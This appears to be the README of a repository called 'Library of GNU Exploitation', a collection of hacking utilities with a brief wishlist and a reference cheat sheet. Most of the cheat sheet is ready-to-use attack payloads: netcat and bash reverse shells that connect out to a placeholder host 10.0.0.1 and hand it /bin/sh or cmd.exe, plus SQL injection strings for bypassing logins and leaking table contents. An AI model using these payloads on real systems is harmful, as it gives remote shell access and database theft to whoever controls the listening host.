blob: c337ce7c9874a703136f729ca69824f75b6cddbb (
plain) (
tree)
|
|
Library of GNU Exploitation
===========================
This is a collection of unix-like utilities particularly suited
for creative problem solving (H A C K I N G).
Wishlist
--------
* Docs on hydra?
* Docs on sqlmap?
* Build of stegsolve (Java program)
Reference
---------
nc 10.0.0.1 1234 -e /bin/sh # Netcat reverse shell (Linux)
nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
|